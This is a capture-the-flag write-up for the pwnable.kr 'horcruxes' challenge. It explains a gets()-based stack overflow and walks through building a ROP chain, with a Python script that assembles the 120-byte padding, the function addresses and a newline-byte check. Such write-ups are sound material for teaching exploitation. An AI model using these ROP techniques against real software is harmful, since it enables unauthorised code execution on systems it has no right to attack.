# 21 - horcruxes

## The Challenge

Voldemort concealed his split soul inside 7 horcruxes. Find all horcruxes, and ROP it!

author: jiwon choi

`ssh horcruxes@pwnable.kr -p2222` (pw:guest)

## The Solution

Let's examine the program first.

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIG9ZT0-zYl2wMBZbnk%2F-MIJIDTqAvgcdW9cDgEi%2Fimage.png?alt=media\&token=203c9e66-4e83-45ee-8b84-e89069eb409b)

It asks us to select a number from the menu and then how much EXP we earned. Not very informative. We copied the binary to our machine and disassembled it. This is `main`:

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIG9ZT0-zYl2wMBZbnk%2F-MIJJ-EHK1EuTGm6iBHF%2Fimage.png?alt=media\&token=2b3022ae-0e2f-4af9-b7d1-867bc113a616)

1. An alarm is set to throw us out after 60 seconds
2. The message about Voldemort is printed
3. `init_ABCDEFG` is called
4. Some security rules are set (probably to prevent us from corrupting the machine once we achieve code execution)
5. `ropme` is called

Let's take a look at `init_ABCDEFG`:

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIG9ZT0-zYl2wMBZbnk%2F-MIJKGG4LAzYb4LE-k8t%2Fimage.png?alt=media\&token=fc76194a-f0fa-43aa-8b83-6df641e32fd2)

Seven integers named `a` to `g` are each set to a random int. Their sum is saved in `sum`. These variables have global scope. Let's take a look at `ropme`:

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIJsUWHQ2g_Iw5C8-6j%2F-MIJtc_YFF4Xe8wuCUPm%2Fimage.png?alt=media\&token=81a2c910-ddec-456b-a3a1-305b323f3374)

The functions `A` to `G` print the values of the variables mentioned above. The EXP input is read with `gets`, which is great news: this is where we're going to ROP.

But wait, can't we just redirect the function to print the flag?

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIJsUWHQ2g_Iw5C8-6j%2F-MIJuy_IThMKpVIBYyaV%2Fimage.png?alt=media\&token=2b012fc3-8775-4344-8d45-0d2189ad4045)

All of the addresses in `ropme` contain the byte `0a`. `gets` stops reading as soon as it receives `\n`, which means we can't return to any position within `ropme`.

We created a ROP chain that calls `A` to `G` one after the other. It contains:

1. A 120-byte buffer that overwrites the stack up to and including the saved `ebp`.
2. The addresses of all of the functions `A` to `G`. Finding the addresses is easy with a disassembler. They are placed one directly after another, since none of these functions take parameters.
3. The address where `ropme` is called from (since we can't resume execution within `ropme`).

Now we can obtain `a` to `g` and calculate their sum (reducing it modulo 2^32 into a signed 32-bit value, in case the sum overflows past MAX or MIN int).
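The chain layout from the list above and the `0a`-byte constraint from the `gets` discussion, as an added example that is not part of this writeup or its linked script. Every address in it is a hypothetical placeholder (the writeup does not list them; the real ones are read from the binary with a disassembler), the 120-byte padding is the value given above, and the "EXP" output lines it parses are constructed here rather than copied from the binary. It builds the payload, refuses any address that `gets` would truncate at a newline byte, and folds the seven values into a sum that wraps exactly like a C `int`:

```python
import re
import struct

# Hypothetical placeholder addresses: the writeup does not list them, and the
# real ones are read from the binary with a disassembler. None of these
# contain a 0x0a byte, which is the property the chain depends on.
FUNC_ADDRS = {
    "A": 0x08049011, "B": 0x08049022, "C": 0x08049033, "D": 0x08049044,
    "E": 0x08049055, "F": 0x08049066, "G": 0x08049077,
}
RET_AFTER_CALL_ROPME = 0x08049099  # placeholder: return site of `call ropme` in main
PADDING = 120  # bytes from the start of the gets() buffer through the saved ebp


def p32(value):
    """Pack a 32-bit address little-endian, as the x86 stack expects."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def has_newline_byte(addr):
    """True if any byte of the packed address is 0x0a. gets() stops reading at a
    newline, so such an address can never be written onto the stack whole."""
    return b"\n" in p32(addr)


def build_payload(func_addrs, ret_addr, padding=PADDING):
    """Padding up to and including the saved ebp, then the return addresses:
    A..G in order, ending with the address that re-enters main after ropme."""
    chain = [func_addrs[name] for name in "ABCDEFG"] + [ret_addr]
    bad = [hex(a) for a in chain if has_newline_byte(a)]
    if bad:
        raise ValueError(f"addresses truncated by gets(): {bad}")
    return b"A" * padding + b"".join(p32(a) for a in chain)


# Constructed line format for this example; the real binary's text would be
# matched against whatever it actually prints.
EXP_RE = re.compile(r"EXP ([+-]?\d+)")


def parse_exp_values(output):
    """Extract one signed integer per horcrux line printed by A..G."""
    return [int(m.group(1)) for m in EXP_RE.finditer(output)]


def wrapped_sum(values):
    """Sum the values the way a C int would: wrap into the signed 32-bit range."""
    total = sum(values)
    return (total + 2**31) % 2**32 - 2**31


if __name__ == "__main__":
    payload = build_payload(FUNC_ADDRS, RET_AFTER_CALL_ROPME)
    print(len(payload), "bytes; first gadget bytes:", payload[PADDING:PADDING + 4].hex())

    # Constructed output standing in for the seven lines the chain makes A..G print.
    captured = (
        "found A (EXP +2147483647)\n"
        "found B (EXP +1)\n"
        "found C (EXP -5)\n"
        "found D (EXP +7)\n"
        "found E (EXP -2000000000)\n"
        "found F (EXP +123456)\n"
        "found G (EXP +0)\n"
    )
    values = parse_exp_values(captured)
    print("values:", values)
    print("sum the program will compare against:", wrapped_sum(values))
```

The newline check is what turns the page's observation about `0a` into something mechanical: every address is packed little-endian and scanned for the byte `gets` stops on, so a chain that would be silently truncated on the wire fails before it is sent. The wrap in `wrapped_sum` matters because the seven randomized ints easily overflow a C `int`; Python's arbitrary-precision sum would otherwise disagree with the value the program stores in `sum`.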

To get a better understanding check out our [script](https://github.com/nickbhe/CTFWriteups/blob/master/pwnable.kr/21-horcruxes/horcruxes.py).
